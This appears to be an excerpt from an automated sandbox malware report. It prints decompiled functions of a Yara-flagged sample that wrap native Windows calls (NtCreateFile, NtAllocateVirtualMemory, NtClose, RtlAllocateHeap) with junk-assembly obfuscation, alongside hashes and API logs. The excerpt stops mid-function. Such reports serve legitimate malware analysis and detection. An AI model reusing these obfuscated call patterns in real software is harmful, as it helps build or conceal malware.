                      			E0041A34A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("popfd");
				asm("repe sbb byte [ebp-0x74aaa25a], 0xec");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                      0x0041a34a
                      0x0041a34b
                      0x0041a353
                      0x0041a35f
                      0x0041a367
                      0x0041a39d
                      0x0041a3a1

                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                      • Instruction ID: 5d37e0bc2e5497f3ba9e256379f8536d62525a8f8307c94596b62d97346bd883
                      • Opcode Fuzzy Hash: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                      • Instruction Fuzzy Hash: 5F01B2B2201108AFCB18CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A350, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 262 41a350-41a366 263 41a36c-41a3a1 NtCreateFile 262->263 264 41a367 call 41af50 262->264 264->263
                      C-Code - Quality: 100%
                      			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                      0x0041a35f
                      0x0041a367
                      0x0041a39d
                      0x0041a3a1

                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A530, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 265 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                      C-Code - Quality: 100%
                      			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                      0x0041a53f
                      0x0041a547
                      0x0041a569
                      0x0041a56d

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A47B, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 271 41a47b-41a4a9 call 41af50 NtClose
                      C-Code - Quality: 43%
                      			E0041A47B(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				_pop(_t11);
				asm("popfd");
				asm("daa");
				asm("insd");
				asm("fcom qword [ebp-0x75]");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}





                      0x0041a47b
                      0x0041a47c
                      0x0041a47d
                      0x0041a47e
                      0x0041a47f
                      0x0041a483
                      0x0041a486
                      0x0041a48f
                      0x0041a497
                      0x0041a4a5
                      0x0041a4a9

                      APIs
                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                      • Instruction ID: 224f3cab7641eba9fa5498746abd3f9922e224dbb1b3f46e5902b56a1c4f2db2
                      • Opcode Fuzzy Hash: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                      • Instruction Fuzzy Hash: 04E08C75600200ABD720DFA9CC86EEB7B68EF84364F104199BA1DEB242C630A50186A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A480, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0041A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                      0x0041a483
                      0x0041a486
                      0x0041a48f
                      0x0041a497
                      0x0041a4a5
                      0x0041a4a9

                      APIs
                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A698F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                      • Instruction ID: de06ef428b3e9f0451531bbbdcc1b2b873ccd55260525c79bff139edc965d7f2
                      • Opcode Fuzzy Hash: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                      • Instruction Fuzzy Hash: 0190026160100502E20271694804616001A9BD0381F91C032A1055555ECA658992F171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                      • Instruction ID: 14de7ebefaab9ccc24c99cd76975180ce32aafb50e1d4538848f1dae89dc26f7
                      • Opcode Fuzzy Hash: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                      • Instruction Fuzzy Hash: 6290027120100413E2126169490470700199BD0381F91C422A0455558D96968952F161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                      • Instruction ID: b1f62913d1b5a8eefa9d95bd600ccb687fed96380f8c4c1820645e7f88d55fca
                      • Opcode Fuzzy Hash: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                      • Instruction Fuzzy Hash: 25900261242041526646B16948045074016ABE0381791C022A1445950C85669856E661
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                      • Instruction ID: 067ae6ef6ecf2ed9457a95aad9d2030ce8d4ebd65acc2f0776cd1e7ea8259950
                      • Opcode Fuzzy Hash: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                      • Instruction Fuzzy Hash: D59002A134100442E20161694814B060015DBE1341F51C025E1095554D8659CC52B166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                      • Instruction ID: 954f0f192534fd47b2bec5c401b5ccaf24c77622efc9af7bad5635ffa8b005e2
                      • Opcode Fuzzy Hash: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                      • Instruction Fuzzy Hash: 0D9002B120100402E2417169480474600159BD0341F51C021A5095554E86998DD5B6A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                      • Instruction ID: 6a7d9573675f86a645906e1d50146a4bc0aa27aa2870921617e36955064f8eb0
                      • Opcode Fuzzy Hash: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                      • Instruction Fuzzy Hash: A690026160100042524171798C449064015BFE1351751C131A09C9550D85998865A6A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                      • Instruction ID: b9426e8c33b5f641d0218486de146f3416d0831e0d6beb4ba4c0fe056b57bf4c
                      • Opcode Fuzzy Hash: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                      • Instruction Fuzzy Hash: C490027120140402E20161694C1470B00159BD0342F51C021A1195555D86658851B5B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                      • Instruction ID: 641623cff6d985c587d86227fca349b6099bceb6885b597bc39de05c02aa9e21
                      • Opcode Fuzzy Hash: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                      • Instruction Fuzzy Hash: 9390026121180042E30165794C14B0700159BD0343F51C125A0185554CC9558861A561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                      • Instruction ID: 7db3bf3433d3d111e0c74b8438bfdeff5ca9c55e8b09549d2b65af344c586f88
                      • Opcode Fuzzy Hash: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                      • Instruction Fuzzy Hash: 9B9002A120200003520671694814616401A9BE0341B51C031E1045590DC5658891B165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                      • Instruction ID: cfe49f623e318cb542ce5e3a865a937896d23fe001307d52be8655e90f50ffb9
                      • Opcode Fuzzy Hash: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                      • Instruction Fuzzy Hash: 72900265211000031206A5690B0450700569BD5391351C031F1046550CD6618861A161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                      • Instruction ID: 991060d16746c63a908405aded9fd2bbf364c8dd12368440e248f1c24b6e11cb
                      • Opcode Fuzzy Hash: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                      • Instruction Fuzzy Hash: 1D90027120108802E2116169880474A00159BD0341F55C421A4455658D86D58891B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                      • Instruction ID: 781a8255d62dcf4fc3ea1261527b6b07674a87e27498999ad61092a70af80ab9
                      • Opcode Fuzzy Hash: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                      • Instruction Fuzzy Hash: 5F90027120100802E2817169480464A00159BD1341F91C025A0056654DCA558A59B7E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A697A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                      • Instruction ID: 231fec821eff354a2640b818d3b2afa05a7ed6fdde836660a6e06cad044f6a6f
                      • Opcode Fuzzy Hash: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                      • Instruction Fuzzy Hash: 1B90026130100003E241716958186064015EBE1341F51D021E0445554CD9558856A262
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                      • Instruction ID: 40a37a95f365f07569ea185ee0272378452be679f780fa51fbde9fed2cdec828
                      • Opcode Fuzzy Hash: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                      • Instruction Fuzzy Hash: FF90026921300002E2817169580860A00159BD1342F91D425A0046558CC9558869A361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                      • Instruction ID: 386471ae4f6d682ccc07f0809ab14a9b88e91409d86e81809b2cc46760e0c222
                      • Opcode Fuzzy Hash: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                      • Instruction Fuzzy Hash: 8490027120100402E20165A9580864600159BE0341F51D021A5055555EC6A58891B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00409AA0, Relevance: .1, Instructions: 92COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A692, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 18%
                      			E0041A692(void* __ebx, void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t18;
				void* _t20;
				void* _t22;
				void* _t25;
				void* _t26;

				asm("in al, 0xf0");
				asm("adc cl, [ebx+0x6f]");
				if(__eflags <= 0) {
					__eflags =  *(__ebx + 0x55557d72) * 0xffffff8b;
					__ebp = __esp;
					__esi = _a4 + 0xc7c;
					ExitProcess(_a8);
				}
				 *((intOrPtr*)(_t20 - 0x73)) =  *((intOrPtr*)(_t20 - 0x73)) + _t22;
				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + _t22;
				E0041AF50(_t25);
				_t7 =  &_a12; // 0x414526
				_t18 = RtlAllocateHeap( *_t7, _a16, _a20); // executed
				return _t18;
			}










                      0x0041a692
                      0x0041a694
                      0x0041a699
                      0x0041a69b
                      0x0041a6a1
                      0x0041a6b2
                      0x0041a6c8
                      0x0041a6c8
                      0x0041a62d
                      0x0041a634
                      0x0041a637
                      0x0041a642
                      0x0041a64d
                      0x0041a651

                      APIs
                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateExitHeapProcess
                      • String ID: &EA
                      • API String ID: 1054155344-1330915590
                      • Opcode ID: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                      • Instruction ID: d00da0fc24fa43dfddb9da27cb984b5bb85f809a5ccfa62c29cf1a0df3718626
                      • Opcode Fuzzy Hash: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                      • Instruction Fuzzy Hash: BCF0AFB91042406FD710EF78CC91EEB7BA8AF48354F148599FC5C5B346C231E9158AA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0041A620, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 13 41a620-41a651 call 41af50 RtlAllocateHeap
                      APIs
                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: &EA
                      • API String ID: 1279760036-1330915590
                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                      • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00408309, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 211 408309-40830b 212 408339-40835a call 40ace0 call 414e40 211->212 213 40830d-408336 call 41be50 call 41c9f0 211->213 222 40835c-40836e PostThreadMessageW 212->222 223 40838e-408392 212->223 213->212 224 408370-40838a call 40a470 222->224 225 40838d 222->225 224->225 225->223
                      C-Code - Quality: 67%
                      			E00408309(void* __ebx, void* __eflags, intOrPtr _a4, long _a12) {
				char _v67;
				char _v68;
				void* _t11;
				int _t12;
				char* _t21;
				long _t23;
				intOrPtr _t25;
				int _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t35;

				_t36 = __eflags;
				asm("in al, 0x42");
				if(__eflags == 0) {
					_t1 = __ebx - 0x1374aa47;
					_t35 =  *_t1;
					 *_t1 = _t31;
					_push(_t29);
					_t29 = _t35;
					_t31 = _t35 - 0x40;
					_push(_t25);
					_v68 = 0;
					E0041BE50( &_v67, 0, 0x3f);
					E0041C9F0( &_v68, 3);
					_t25 = _a4;
					_t21 =  &_v68;
				}
				_t11 = E0040ACE0(_t36, _t25 + 0x1c, _t21); // executed
				_t12 = E00414E40(_t25 + 0x1c, _t11, 0, 0, 0xc4e7b6d6);
				_t27 = _t12;
				if(_t27 != 0) {
					_t23 = _a12;
					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t38 = _t12;
